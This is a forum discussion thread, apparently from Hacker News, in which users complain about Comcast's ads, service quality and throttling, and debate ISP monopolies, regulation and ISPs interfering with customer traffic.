What is there to say? This is an incredibly obnoxious theft of attention. Comcast has perfected the art of harassing its customers with unwelcome noise for what must be marginal profit. I know someone with a Comcast cable box whose channel menu forces the viewer to pass over a banner advertisement after every fourth channel. This combined with the horrible rubbery buttons on the remote means that to browse through twenty channel titles takes perhaps as many seconds. Add to this "actionable" banner advertisements displayed over the content and seemingly endless commercial "breaks" and I find it essentially unusable. On top of it all, I understand that people pay over a thousand dollars a year for this service. Comcast's flagrant disregard for customer satisfaction, or even their basic human dignity, is a striking testament to the failure of regulators to ensure adequate competition in this space.
FiOS does the same thing with its cable box. I'm not sure it's every fourth channel, but doing anything with the cable guide often involves dismissing an interstitial ad on the way to whatever you were trying to do, made all the more annoying by the slow UI.
TV service just keeps getting more and more obnoxious. I only got it because it came with 2 years of free HBO and was cheaper than Internet alone at the tier I wanted. There's hardly any reason to watch cable TV any more. (I know, sports. Not really my thing, but I get that a lot of people want to watch live sports)
I can't speak for Comcast, but my FiOS boxes allow for you to turn off the initial launch/guide ad popups in your box settings. It's not the easiest of settings to find, but it's there (and enabled by default, of course). Call support (fast and helpful...not kidding) or search the online support area, which is how I figured it out and was easy to find the answer. The only persistent ad, I believe, is a single ad bar (annoying, but doesn't obstruct view) at the bottom of the channel guide, used mostly (from what I recall...I don't pay much attention to it) for promos of new on-demand releases. Love LOVE FiOS.
If this is how Comcast treats its customers, I wonder why anyone would want to pay them to be their customer. Especially a thousand dollars a year. Is this because there's no real competition in the US?
In many areas of the country, the cable companies basically have localized monopolies on high speed internet. They claim they have competition in DSL and satellite (!!!) but these technologies just can't compete on speed in this day and age, leaving cable as the only viable alternative. From what I gather, this is one of the reasons why Google started Google Fiber.
Interesting. Over here, providers are offering VDSL2, advertised as 100/100Mbit. Given my experience with DSL, that probably means about half that for the average user who is 2-3km from the DSLAM box. That's still pretty respectable. Is no one offering modern DSL in the US?
Nope, sadly not. Even in San Francisco (which is pretty sad for being the heart of tech) it is cable or legacy DSL. If you are at a building that has an exclusivity agreement with AT&T, you might even end up paying them $50+ a month for 28mbit fiber. (yes, fiber terminates at my door but that's the max speed they offer)
Well, there is Webpass for some in SF. I pay $60/mo for 100mbits up & down, and some buildings go up to 500mbits. No contracts, and I just hook up to an ethernet jack in my apartment. It is a local startup that is expanding elsewhere.
Webpass is the best Internet service ever. I signed up as soon as our building got it, it was $50/mo then for the 100Mbs. Definitely worth it if you have the opportunity to live in a building that has it. Really straightforward website, billing, and setup. It looks like they're expanding to some other cities. I wish them luck.
I love WebPass, and I used them exclusively in my previous apartment but this new building has this silly exclusivity agreement and Comcast can't make installations on this building as they somehow managed to make this residential building show up as a business address on Comcast's website.
I could get Sonic Fusion FTTN but that's just rebranded AT&T, and peaks at 28mbits. I get better LTE speeds than that.
I tried to bring in MonkeyBrains but the building administration refused, saying they would have to drill into load-bearing columns. Just an excuse.
To be fair, Sonic does offer VDSL2 in many parts of the city, over 100Mbit down, albeit a bit less up. There's also Webpass for larger buildings, which offers almost a gigabit during non-peak times. So SF isn't as dire as you make it sound, though I agree it's behind many other cities.
What?! In Cincinnati I had CincyBell Fibre about three years ago. I think I paid around $60 ~ $70. I don't remember the advertised speed, but it was crazy super fast.
It varies. If you are in an area with actual competition, they try harder. Where I live, it's crappy TWC 20/5 or so for $60 a month, or a selection of DSL providers offering everything from 5/1 to 0.5 megabits per second for around $20 a month. Seriously, there is an ISP offering a 0.5 Mbps DSL for $20 a month, oh, and it bursts to 1 Mbps...
VDSL2+, which is rolling out next year, is even supposed to handle 500/200 – in some areas T-Online has been testing it, and supposedly it works (but it means you have to be less than 100m from the box).
I live in a small town in Georgia and literally my only internet access options are Comcast and AT&T. AT&T's service here is fairly slow compared to Comcast's offerings, and since I work from home remote for a company based in Florida I have to choose the fastest options available to me, and that's Comcast. I would love to have more options, but I just don't.
I only pay for internet access, I don't use their cable TV or telephone offerings. Internet alone is about $80/month. I just ran a speed test and I get 14.1Mbps down & 8.6Mbps up. I forget which speed tier I'm paying for, but I know I'm paying for much more than that! Ugh...
Same thing in my big town -- Chicago. Some parts of Chicago you get RCN competing, which is amazing. They have 100mb plans for $40 a month. But for most people, myself included, you pay $80/mo for "50mb" internet that really runs at about 20mb 80% of the time, 2-3mb 15% of the time, and totally not working at all 5% of the time.
Fellow Chicagoan here: In the suburbs the options are fewer, but the functional speeds are better - at least for Comcast delivered over coax. I get an average of about 120/15 for $80/mo at home and about the same speed at our suburban office for roughly double that price (business class).
Also in Chicago, RCN was amazing. Now stuck in Comcast hell since they're not over in Logan Square. And the service starts shitting out every night around 7:30pm. Assuming they don't have enough cards in the box on the block.
In my different area of that small town, I pay $40 for 75 mbit, that actually gives me 95mbit (even at 7:00pm). And is rock solid. I don't mean to sound like a shill but I think "most people" is an incredible stretch.
Yeah, you're totally right. I just went to Comcast's website and it seems like we're basically just getting shafted. I wonder if they adjusted their prices now that RCN is selling 105mbps internet for ~$40-50/mo
Get their business plan. I always get exactly my paid-for rate, and they claim business plan speeds are the same everywhere they provide service. You save money on land living in a small town; spend some of the savings on bandwidth... Or expense it to your company. Cheaper than office space in Florida. Or try calling them, maybe there is a configuration issue with the router. What is the advertised rate? You should be getting that speed.
You're a bit naive there. Business plans are not magical in any way. In fact, the past week we seem to be having a lot more issues with our business plan on Comcast than I am with my personal plan at home which seems to drop the connection roughly every other hour.
Still, Comcast shares their internet between customers in your area. If you're the only customer in your area, you can certainly get what you're paying for. If you're not, the best you can hope for is 1/4 of your promised connection speed during peak hours. It is something that Comcast has been doing for years, but it allows them to advertise higher speeds for lower prices than AT&T and people believe them because not everyone is familiar with the fine print.
- I can usually get directly to someone clued on the phone, who doesn't make me jump through hoops or silly scripts to debug a problem; they realize I've already done everything possible on my end already before calling (spent years working for ISPs).
- No blocked ports, I host my own server and do my own email, web hosting, etc. Comcast even provides reverse dns for my five static IPs.
- No data caps. In fact, they don't even measure usage for business accounts.
Other than when I had a physical problem (short in the line from the pole to my house), I've always gotten the speeds that I pay for - in this case 50Mbps down, 10Mbps up.
Disadvantages to business class:
- I pay $150/month for 50/10 and five statics.
- It's Comcast.
I was an ATT UVerse customer (standard, not business) before switching to Comcast Business about 4-5 years ago, but their max speed offering was only around 18Mbps down, and their "business class" service required the same craptastic 2Wire gateway and static IPs required 1-to-1 NAT through that gateway... No thanks.
While I have no direct experience with the business side of Comcast business customer support, I noted that when we reported an issue yesterday at work, it took them over 6 hours to fix it at which point they might as well not have bothered. The operating hours were over.
- Don't care about blocked ports. I don't personally host anything, our company also has a separate hosting service.
- I'm sorry, but... data caps? Is this a joke? In this day and age of services like Netflix and digital content distribution like Steam there's a place for data caps?
- $150/month is a ridiculous cost to put on a guaranteed 50/10 line. Don't care about the static IPs personally as I don't host anything.
- Comcast, right.... you hit it on the nail there, it looks like. My experience with their customer service so far has been horrible. I'm usually empathetic when talking with technical support as I used to do the same job myself, but there's empathy and then there's people trying to intentionally annoy. So far I've felt like bashing my head against the wall after just three sentences from Comcast tech support. And they claim they spend millions on customer satisfaction? Please.
I was a UVerse customer too. I had only one issue with them for the two years I was their customer and I'm seriously considering going back. Better to have a slower connection I can rely on than a 'blazing fast' connection that craps out every 5 minutes.
ATT business plan here... I have no issues. Only 20Mbit down and 2Mbit up, but when I call customer service I have someone on site to fix things in 3 hrs or less.
I won't ever use Comcast again... I had to get the local govt involved to get them to stop billing me for a place I hadn't lived in for 6 months. (Yes, there is an agency here to deal with them; they are that shitty.)
The smaller speed with usable internet speeds and decent customer service is worth it.
Yeah, I'm definitely reconsidering ATT. I have coworkers that swear by Comcast and how great they are but my experience has been flaky at best. I work from home regularly, so I need my connection to be stable. I also do a fair bit of online gaming which also requires a stable connection.
It kind of tends to hurt not just me, but a fair bit of other people in the process when I, as a raid leader for our guild, cannot maintain a stable connection and get dropped several times over a 2-hour period. Never had those issues on my ATT connection and I've only had a single issue where a tree had fallen and severed a cable during 2 years of being their customer.
I wanted to start streaming our raids which was also the main reason to try the switch, but if it comes at the cost of being unable to take part in them, I might as well not bother.
Similar experience: our older house had AT&T - only 7.5 Mbit/s or so, but it pretty much never went down; our newer house has Comcast - supposed to be 30 Mbit/s, but often goes wonky or out.
It's a tough call: go 1/4 speed at 1/2 the price, reliably, or try to go 4 times faster at "only" twice the price (appx), but gamble from day to day :-(
Good to have another data point. I have not had issues in a year. I routinely download at 10 megabytes per second reading CT scans. If I wasn't getting what I was paying for, I would cancel the service and drive into work to read my cases. I am in a residential non-techy area, I don't know if that helps.
I'm sorry, that sounds brutal. I live in Brooklyn and thankfully there is competition from TWC, RCN and Fios here. I have TWC cable at 300 megs down and about 50 up for about $60 a month. The cable television is still horrible and an enormous rip off.
What are your options for satellite internet? The pricing these days seems very competitive, and although latency is (much) higher it should be ideal for the vast majority of use cases.
Latency is pretty important for browsing the web. No matter how much bandwidth you have, making every request take two round-trips to geosync is going to make the connection feel very slow.
If low Earth orbit broadband internet ever happens, that could potentially be an excellent choice. But with the current offerings, it's always going to be the absolute last resort.
It looks like they charge the same price for ~1/10 the speed and 1/20 the transfer (Does Comcast still have a 300 GB limit? That compares favorably to 10.)
Nobody really wants to be a Comcast customer. Comcast thrives because they're mostly the only choice or the less bad choice of two.
I was a "happy" Comcast customer for years. I was in a condo where the choices were Comcast or Verizon DSL. Maybe. I called Verizon to see what they had to offer and they didn't know if I could get their DSL service or not. The best they could do was to place an order and see if it worked. Really!
Even if I could get service from them, their offer was 1.5Mbps for something like $50/month. Completely ridiculous.
It was like this when I moved out about three years ago, and as far as I know it's still like that today.
I wouldn't say there's no competition per se, but some areas are limited based on who has lines out there. For example, the area I live in at Augusta only offers Wow! as a cable provider; overpriced reseller. But, I was fortunate enough to land a decent contract- more channels than Wow! and for 1/4 the price- with Dish. Satellite vs. Cable, but I'm willing to take that trade off for a better price point. Plus there's always Netflix/Hulu.
To give you an idea, my internet options in my area are:
- Comcast (up to 100MB/s)
- Century Link DSL (up to 10MB/s)
- 3G/4G modem (up to like 3MB/s)
Then 10 minutes south of where I live, that county has deals with a local ISP who behaves exactly like Comcast, but with terrible pricing and lower caps. Also no realistic alternatives.
While I could stomach the speeds of DSL (with some effort), I can't stomach the price. I'd end up paying just as much as comcast for much lower speeds. I really don't have a choice.
Yes. Many markets have literally one option. My options for internet are comcast, or satellite probably? So really my only high speed option is comcast. I don't even think I can get DSL. I think a lot of markets the monopoly is even being protected by law.
It's like that in a lot of places. I live in extremely central Berlin and cannot find a provider that can deliver above 25mbps for less than hundreds per month.
It is a real shame that anything over 5-7mbps is considered "fast enough" by the vast majority of consumers.
Don't like ATT either, but at least their service seems to be much more stable. I haven't had to speak with an AT&T customer support rep in over a year. Comcast, I've been doing their trial service run for two weeks now and I've already had to deal with their customer support 6+ times, 2 of which were during the installation. I think I'll probably just end up canceling before my month is up and going back to ATT. At least I knew I could rely on my connection to not crap out at random.
"I know someone with a Comcast cable box whose channel menu forces the viewer to pass over a banner advertisement after every fourth channel. This combined with the horrible rubbery buttons on the remote means that to browse through twenty channel titles takes perhaps as many seconds."
How weird is it that the equipment is still so slow? I mean, in 2005 I was grumpy about how slow cable TV gear is. Now it's 2015 and seems like it's exactly the same, whenever I see it.
What is so hard about using processors with clock speeds measured in megahertz and not kilohertz nowadays? I swear, Comcast is probably paying extra to some supplier holding the last supply of their specialized MegaSlowz chips with the SuperProprietaryFeature that you Can't Reimplement Anywhere Else.
> What is so hard about using processors with clock speeds measured in megahertz and not kilohertz nowadays?
What's funny (maybe not ha-ha funny, but anyway) is that the provided equipment is usually energy inefficient as well. Even while "off".
I'm not paying for cable now, and don't plan to in the future either. There's too much crap I don't want to watch, and I don't want to be stuck with their idea of a DVR either. And it's too expensive.
Plus you can only get it (at least in my area) if you subscribe to extra services that I don't need like VOIP. CableCard could've been a viable alternative and spurred a market for DIY and third party cable tuner/decryptors but it was poorly implemented and support from cable providers is typically awful so for most people it's just not worth it.
I came close to ordering a Ceton CableCard tuner card several times so I could stick a small form factor PC in the entertainment system and get the nice setup I used to have before they killed off all of the unencrypted digital QAM channels. Unfortunately, the standard is so encumbered that hardly any software can support CableCard (one popular option was the now-deprecated Windows Media Center).
Back when QAM still came through unencrypted, I could pay for cable and hook it up to my cheapo Hauppauge card and use WMC as a great program guide and DVR setup. Even back in the Win Vista days it was vastly superior to anything on a cable box. Then they moved everything to encrypted and my tuner got repurposed for watching OTA stuff on my PC.
Now I just pay for cable/internet but watch everything streaming on legit sites or torrents. Yeah, I know...but it works better and I'm still paying for it so even if it's not legal, I don't feel that it's immoral.
My HTPC is still running Windows 7 only for Windows Media Center (using a HDHomerun Prime decoder box and CableCard). Once the program guide information is no longer updated or Microsoft somehow forces me to get rid of Windows 7, I will in turn get rid of cable TV.
The only reason I still have it is for basketball, but there are an increasing number of services (legal or otherwise) by which I can get all of that streaming online, so I may end up cancelling even sooner if given an excuse to do so (like if service goes down or they decide to jack prices again).
YMMV, but I also have TV service (U-Verse) only for basketball, and it saves me a ton of money to turn it off/sign up twice a year. Since it's only 5-6 months of the year (college basketball), I always get the "new customer" rate, and often there are enticements like gift cards. Something to consider.
When I had U-Verse I would call every 3 months and say I was cancelling. Then they would give me whatever latest "new customer offers" were currently available.
After 3 months those offers expired, I'd get a high dollar bill in the mail, so I'd call again... Wash rinse, repeat. I know multiple other people who did the same thing.
Now I only have data with TWC and receive letters 2-3 times a month from to tell me all about the great TV plans they are offering.
That's the number one reason I bought one of these HD Homerun cable tuner boxes[1]. Once I have a VLC playlist setup with the stream urls to each channel, switching channels is almost as fast as in the old days of analog cable TVs.
Maybe another 4 hours of work got me a little web application that shows the TV guide information pulled from an API, and is hooked in with the VLC web interface to switch channels with a click.
> Comcast's flagrant disregard for customer satisfaction, or even their basic human dignity, is a striking testament to the failure of regulators to ensure adequate competition in this space.
I'd argue that government regulations have done nothing in this space but reinforce coercive monopolies. I think you're taking the wrong approach, we need to deregulate this space and allow real competition to thrive.
Except for Comcast, at&t, and time warner, who have been getting massive subsidies to improve infrastructure to far beyond what it is today. I think the case could be made that this prohibits new players from entering.
To be fair the "X1" has a much better UI/UX and digital buttons. Plus the voice search (you talk into the remote) works exceptionally well. There is no lag. I might say I actually like it. I was shocked that it came from comcast.
They actually have some comcast lab product where you can play games using your smartphone as the controller. I think it's beta but it wasn't that bad when I tried NBA Jam.
Source: comcast is my only internet option so I bundle.
Actually using a Comcast cable box to watch things in 2015. I can't understand it. An Apple TV with a netflix and hulu account get you 95% of the way, with 100X better of a user experience.
Or if you don't have $100 to spare, you can always connect your laptop to your tv.
Will it solve wanting to see live sports and all the "good morning" shows I watch while prepping to go to work and do I get the new episodes of shows on their release day?
For sports it looks like there are some online, subscription type options. Still, I'd say that sports and morning shows would fall under the 5% not covered, but if those are super important to you then I could see that being an issue.
Hulu is pretty good about getting new shows up pretty quickly, usually the day after. I'm usually able to live with not seeing a show the minute it airs.
Comcast is on my list today for a different reason. We have Comcast Business Class service at one of our FL locations.
Tuesday we could not access VNC nor our remote database services from that location. All port 80 traffic was fine. I had one of the staff call, wait on hold for an hour.
Just as I suspected Comcast had implemented port blocking on a high priced business account. It took the guy a second to release it. It put our company down for two to three hours.
Also the speed of Comcast service drops to 15-20% of advertised from 2:30 to 5 PM when kids arrive home from school.
Once the contract is up we are moving the service to someone who understands "business class".
The same thing happened to us recently. I can't remember which port they blocked, but it took out rubygems, bitbucket and github in all of Utah.
It took a while before someone finally figured it out and word spread on Twitter. I'm sure hundreds of thousands if not millions of dollars of productivity were lost that day.
This change is also required when sbux moves to using Google internet. I was scratching my head when it worked one week and then stopped working the next.
And that is the root of the problem. Normally when a business has the kind of terrible customer service and can't-be-bothered attitude, I just take my business elsewhere. But in the last 15 years I've never had a real choice what to use for Internet service. A couple of places I've lived I've had one additional choice that was even worse. Lack of choice and diversity in Internet providers is the problem here. I'm not sure what the root of that problem is, but I suspect it's governmental corruption and lobbying to maintain status quo.
The root of the problem is the legal difference between POTS (Plain Old Telephone Service), which has been around a long time, and broadband, which came much later and had the POTS environment as an example of what to avoid (from the POV of Comcast and their ilk).
The old dialup ISPs were allowed to resell internet service on the local provider's POTS lines. There was quite a lot of competition, and the service was generally excellent, even generally better than the carrier's.
There is no requirement for broadband providers like Comcast to allow resellers. The barrier to entry for laying other broadband lines is huge; Google is one of the few who can do it. So unless there's a quantum leap in wireless to the curb, there will be no meaningful competition to amoral corporations like Comcast; we're stuck and it will continue to suck.
The real root of the problem is lack of regulation. A scarce resource like the last mile copper and cable, is owned by the oligopoly of Comcast, AT&T and a few others. This constitutes in essence a monopoly, which are illegal for obvious reasons and led to the breakup of the old AT&T. Other countries have a last-mile sharing requirement, like for example in Germany. This provides at least a modicum of competition and consumer choice in the ISP market.
[EDIT] Corrected wrong assumption that old AT&T was government owned.
Yep. I have the choice of Comcast or AT&T, the latter of which only recently got competitive in the speed category. I was with AT&T for many years, before my current 10+ year stint with Comcast. They are both horrible on customer service and IT (managing their own infrastructure). It's really a toss up as to which is worse.
I know Google fiber will never come to the East Bay (SF area). It would be so nice to have, though.
It's really a mix of over-regulation and under-regulation, with a lot of regulatory capture. In this case the monopolies are not illegal, they're actually protected by regulation.
The root problem is that telecommunications is similar to utilities in that it is a natural monopoly.
Basically imagine if someone owned the only bridge into San Francisco. They could charge whatever people were willing to pay. But you would think if they charge too much money or scream obscenities at everyone who drives through, then someone could build another bridge and steal their customers. The problem is that if anyone builds another bridge the bridge owner could stop screaming obscenities and lower his prices. Then the second bridge could not make the return on capital. The prospective business owner and current owner know this so the status quo of one expensive and crappy bridge remains.
Unfortunately I think this is the experience of most people in the U.S. At least in my adult life, the choice has mostly been between AT&T and Comcast. I was lucky to get 100Mbs for $50/mo for a while (obviously with a small ISP), but that was just a particular building that happened to have a point-to-point wireless setup on the roof. Now things are worse... I happen to live somewhere that actually has fiber in the ground (thanks to some federal grant the city received) but there is no service provider that uses it! I would be happy to ditch AT&T/Comcast for life if it were possible.
With all due respect, your customer service policy should be based on doing the right thing regardless of the forum, as opposed to simply responding to those who have an audience.
The data caps you've recently put into place in my market are going to effectively double my account price per month. I look forward to the day that I have other choices.
No one is blaming individual employees. Quite the opposite, in fact—they're blaming the organization for failing to address issues unless the right individual is reached.
That's been my experience, as well. In two instances (one business class, one residential), I had issues getting their construction department to actually do the work they promised until I was able to get through to the escalation department—once via Twitter, once (IIRC) on dslreports.com back when the Comcast direct forum was monitored. Once the escalation department was engaged, things moved very quickly, with them calling me almost daily with status updates.
There are clearly individuals at Comcast who care about customer service. Unfortunately, they don't seem to be the ones in charge of organizational policies and processes.
Agreed. I recently decided to give Comcast another go because my current provider has some horribly bad upstream speeds, but even with brand new service, I seem to be having issues where my connection drops 4-5 times a day. It is not too big a deal when you're trying to work from home, but it can be a massive pain in the neck when you're trying to play anything online. I've been trying to resolve this issue with their customer support but I've gotten nowhere so far and feel like I'll probably just go ahead and cancel out of the contract before my first month is up.
They do advertise that they spend millions of dollars on improving their customer support, but I've yet to see anything happen on their end. Amusingly, our Comcast business contract at work has at least a couple of issues every week, too. We only don't notice them if they happen over the weekend, but when CRON jobs that require an internet connection haven't run over the weekend, it's easy to figure out who needs to be blamed.
I agree with you. I'm troubled though by this new era of customer service where the focus is on having a team of people who monitor social media for the loudest complaints and devote resources to solving those out of fear of bad PR.
I do my best (customer support is not my day job) - if you are having issues I'd encourage you to try out the tool I helped build here: https://speedexperience.xfinity.com/
Some listing of what the actual issue is would be kinda useful, even if you shove it in a collapsible div to hide it away.
I (and most people) am more likely to rage-quit and go do something else than try to navigate three layers of outsourced customer service that is designed and optimized to deflect people, waste their time, and only if they are sufficiently insistent, and borderline belligerent, maybe give them an answer more involved than "unplug your modem and plug it back in".
Yes, all of the wifi stuff we add in the future will be only possible on comcast-provided wireless gateways (XB2/XB3). We have some other nifty ideas that would use our gateways too. Most of the existing stuff I mentioned is not specific to comcast-provided devices, or wireless gateways.
At least one employee would be to blame, right? Comcast's network hasn't become sentient, and isn't actively rebelling against human businesses by shutting down random ports. At some point, someone either made an explicit decision to do this, or decided to skimp on training.
It could also be an endemic culture problem, where lots of people skimp on lots of tiny things to the point that the final performance goes down the drain. No one to blame, but everyone to blame.
> I look forward to the day that I have other choices.
Same here. They are very aware that we have no other choices. They will continue to provide the least amount of service for the greatest cost until this changes.
The week after google fiber arrived in my neighborhood, my cable provider "spontaneously" decided to double my connection speed for the same price, "because we care about our customers and want them to have the best experience possible."
I had Comcast when I lived in Chicago. They basically run that city. You can't get any decent internet anywhere else. All the other providers in the city, for some reason, didn't cover any neighborhood I was in.
The biggest thing I liked about moving back to Iowa was having a decent internet provider.
>For a CMTS port to enter the Near Congestion State, traffic flowing to or from that CMTS port must exceed a specified level (the "Port Utilization Threshold") for a specific period of time (the "Port Utilization Duration").
>Given our experience as described above, we determined that a starting point for the upstream Port Utilization Threshold should be 70 percent and the downstream Port Utilization Threshold should be 80 percent. For the Port Utilization Duration, we determined that the starting point should be approximately 15 minutes.
>Thus, over any 15-minute period, if an average of more than 70 percent of a port's upstream bandwidth capacity or more than 80 percent of a port's downstream bandwidth capacity is utilized, that port is determined to be in a Near Congestion State.
>For a user to enter an Extended High Consumption State, he or she must consume greater than a certain percentage of his or her provisioned upstream or downstream bandwidth (the "User Consumption Threshold") for a specific length of time (the "User Consumption Duration").
>we have determined that the appropriate starting point for the User Consumption Threshold is 70 percent of a subscriber's provisioned upstream or downstream bandwidth, and that the appropriate starting point for the User Consumption Duration is 15 minutes.
> A user's traffic is released from a BE state when the user's bandwidth consumption drops below 50 percent of his or her provisioned upstream or downstream bandwidth for a period of approximately 15 minutes.
Hmm, actually I don't think I caught how much your speeds are actually reduced.
It's throttled until you've used less than 50% of what you pay for for at least 15 minutes.
That threshold is so low specifically so that a line doesn't end up cycling between throttled and not every interval if it's 79% once then 81% the next, etc.
It seems obvious to me that Comcast et al are vastly overselling beyond their capacity.
They then market these strategies as methods to ensure quality to their customers, when their customers bought a service that was misadvertised as having enough capacity for them in the first place.
Just like airlines - they sell more tickets than they have seats, because they figure they can squeeze more profit out of the people who paid for a ticket but didn't show up, then when everyone shows up, someone has to get bumped.
I believe it is that if you use more than 80% and someone else is using 60%, IF throttling occurs on the network, the person using 60% will have priority over you.
Question #1: Is the CMTS Upstream Port Utilization at an average of OVER 70% for OVER 15 minutes?
Result #1: CMTS marked in a Near Congestion State, indicating congestion *may* occur soon.
Action #1: Search most recent analysis timeframe (approx. 15 mins.) of IPDR usage data.
Question #2: Are any users consuming an average of OVER 70% of provisioned upstream bandwidth for OVER 15 minutes?
Result #2: No action taken.
Result #3: Change user's upstream traffic from Priority Best Effort (PBE) to Best Effort (BE).
Question #3: Is the user in Best Effort (BE) consuming an average of LESS THAN 50% of provisioned upstream bandwidth over a period of 15 minutes?
Result #4: Change user's upstream traffic back to Priority Best Effort (PBE) from Best Effort (BE).
What other provider choice do you have? Whoever they are, they all collude to inflict maximum pain for maximum gain - a hallmark of modern capitalism. Good luck though.
That's not my definition of modern capitalism, I call that corruption. A corruption enabled by government agencies that enforce monopolies that no consumers want to exist.
I agree that in lots of places there are franchise agreements and in others, there are specific laws that deter municipal networks.
That said, you could argue that data networks are mostly a natural monopoly because it's not feasible or efficient to roll out several redundant fiber/cable networks.
Even if there were no franchise agreements in place, very few companies (excepting ones that have other revenue streams) would roll out a second or third cable/fiber network in a city where there is already one in place. Even if you managed to split the market and get half of the potential customers, you'd need to account for the cost of digging trenches and laying cable (which cable TV companies have long since recouped). Makes it hard to stay solvent at such a disadvantage.
It's why a lot of people think the ideal situation is for a single physical network to be built and then service providers pay for access and compete on service to businesses and customers. With physical networks divorced from service providers, the company or municipality in charge of the actual cable/fiber makes their money from maintaining and improving capacity so they can sell access to more providers. Providers compete by offering the best services and customer support in order to profit and pay for more bandwidth on the physical network.
But yeah, it's more complicated (in terms of both business and networking tech) but it's an ideal that many would like to move toward.
What you describe is how the power grid where I live is handled. That's one solution I would be more interested in than these monopolies that only seem to create horrible customer service, high fees, and poor product.
But in the end, I'm not sure what's the best way to handle it. I just know that many would agree that the current methods are not optimum, and possibly detrimental.
By letting the government build and own the infrastructure, then lease the exploitation of it to private companies, and have other companies do the maintenance. This has its own challenges too, but at least the monopoly is in the hands of people who can be voted out.
This model was used regularly for rail and power networks in Europe, but these have all been privatised in the past few decades citing "cost reductions". The net result is that our infrastructure is deteriorating, consumer prices are rising way faster than inflation, and critical infrastructure is now in the hands of a few international power brokers (e.g. the Dutch national telephone grid is owned by Carlos Slim).
If that's how it came about then I would be more apt to accept that. But in the U.S., I find it doubtful any current telecommunications monopoly came to exist without government involvement. A good chunk of that upfront capital and land requirement was given away by the government for promises those companies didn't keep.
Yet, you need money from the beginning, so you are now back to issuing more bonds, and perhaps raising capital with venture investors. This is basically the model of the 19th and 20th century railroad race. Of course the government wasn't directly building the railroad, but they were the ones who gave the land and even troops to open up the new frontiers.
This is abusive. Imagine if anyone else had access to push you notifications by intercepting your communications. Imagine Uncle Sam interrupting your calls announcing you haven't submitted your tax returns yet. Because that's basically what's happening here.
HTTPS is good and all, but the real problem is ISPs which don't want to be anything but a transport provider. Every IP packet I send into their network should end up at its destination, with best effort, completely unmodified, and vice-versa.
That said, in my experience datacenter and enterprise ISPs tend to be far more "pure", so if you want a truly unmolested connection a possible solution could be to use a VPN to a server that terminates in one of those.
> but the real problem is ISPs which don't want to be anything but a transport provider.
This is very, very true. Anyone who has worked at a telco should've heard the "we don't want to be a dumb pipe" argument. The thing is: they can't be more than that! I don't want their applications, they are not very good at doing applications. I don't want their content, they don't seem to get content production at all. Even their research, it has become less and less relevant.
As a customer, I'd rather see all that money spent on efficient ways of transporting bytes, or even directly subsidizing the customer bill (so that they can support smaller ARPUs). But no; I have to pay extra to support the entertainment of their engineers, in order to get sub-optimal apps and content.
It's the other way round: the extra stuff is there as "market differentiation" in order to justify the high prices and prevent commoditisation. The problem is that if you're selling a commodity the price ends up close to the marginal cost of production. Whereas every company wants to have some unique IP they can charge monopoly rent prices for, like Apple.
Same with vendor crapware on phones and PCs. I call this stuff "value subtracted software".
Don't ISPs give up common-carrier protections for things like copyright when they interfere with the traffic? This should make them liable for contributory infringement on any copyright infringements by their customers that they don't take action against.
I like your thinking. So including ads/warnings/popups is effectively making a derivative work on material that Comcast doesn't own. They become liable for copyright infringement.
Frankly the whole "don't want to be dumb pipe" thing is a telco variant of "perpetual growth".
Frankly at one point or other every large company in every mature market has to contend with having reached their growth limit. There are only so many customers in this world for the products and services offered.
The only place that could grow forever is Wall Street, by piling derivatives upon derivatives and passing them round like hot potatoes. Everywhere else has to contend with us being on a physically finite planet.
A lot of ISPs are anything but, including business or datacenter connections.
I had to deal with one of them using transparent DNS proxies without disclosing the fact. Only found out when something broke on their end. The only way to have functional DNS is to tunnel it over another protocol because their equipment will intercept DNS queries to any server and reply with a bogus IP.
Why do you think that they won't intercept HTTPS traffic? They will just instruct users to install their root certificate. It must be illegal for them to interfere with traffic, no matter what this traffic is. Otherwise there's nothing that would stop them.
Most folks in the real world don't know or care what a root certificate is.
If their ISP posts a message telling them they have to install something to continue getting "the best internet possible" or, better yet, when the tech comes to install the modem they just do it as part of the installation service, so few people are going to even think about it, let alone know why they shouldn't want it.
Remember... we here aren't an accurate facsimile of the general population.
> However, we found that users typed the “+” operator in less than half a percent of all searches, and two thirds of the time, it was used incorrectly.
1 in 600 searches used it correctly, another 2 in 600 used it incorrectly.
Stuff like that.
Or have a look through /r/tipofmytongue for people looking for help to identify songs, tv shows, and films. You'd think they'd include details of roughly when they saw the film, or who any of the actors were (or even what other film they'd been in), and then the plot (with some details), or the name of some of the characters, any music, the genre of movie. But you frequently see people who give very vague information. I won't give examples, but it's really easy to find them.
But I do need to remember not to be a judgemental dick about it, and if I was I apologise.
I worked for a company where, as part of one product, users were giving us the user AND PASSWORD for their bank account. We had thousands of users before I left. As a programmer, I was sure that the product wasn't going to be viable... boy was I wrong.
Hah, we have a payment processor here in Germany called "Sofortüberweisung".
It works like this: When you want to pay for something you give them your login credentials to your bank account and a TAN and they send the money to the merchant for you.
The selling point of this service is that SEPA wire transfers usually take one day. But with their service the merchant gets an instant notification of money received and you can get your stuff one day earlier.
It's crazy but people use this and have no problem handing over the keys to their bank account.
>> It's crazy but people use this and have no problem handing over the keys to their bank account.
Part of the problem may be that people don't really understand where those keys are going. They put the information into their computer perhaps via keyboard. Beyond that they often don't know where it goes or where it gets stored. Perhaps they think it's stored locally in an app. For a while people didn't get the distinction between an app and a web site, but I think that's changing. People think Siri does voice recognition on their phone and freak out when you tell them all the recordings are sent to Apple and stored there.
> It's crazy but people use this and have no problem handing over the keys to their bank account.
I wonder whether there's more to that story. It seems like a potentially useful payment service, but it also seems like something the banks would surely be aware of. Customers giving up their credentials like that is probably a blatant violation of the bank's normal terms of business, and asking for those credentials or failing to keep them secure seems legally risky for the payment processor as well, particularly if anything ever goes wrong. Are you sure there's no separate agreement or commercial arrangement to cover this, probably between the payment processor and the banks?
While it's against most bank TOS, that clause has been ruled uncompetitive and therefore void by courts. As far as I know there is only a single German bank (DKB) that officially cooperates and gives them API access. For the rest they use web scraping, the banks are not allowed to (intentionally) break it.
The banks don't like that payment processor and therefore just started a competitor where you only give your credentials to your bank. Hopefully it gains traction.
This is Yodlee, the USA's largest financial API for consumer products (Mint, etc), endorsed by all large banks and investment firms. They have millions of users.
It may be enough if ISPs forfeit common carrier status as soon as they "manage" data and thus adopt full responsibility for every byte going to the customer.
But I thought they didn't even want common carrier status, because they wouldn't be able to throttle your Netflix traffic if they were a common carrier.
But the argument that if they mess with the content and the traffic, they carry responsibility for it that they don't if they're just a dumb pipe, is a good one.
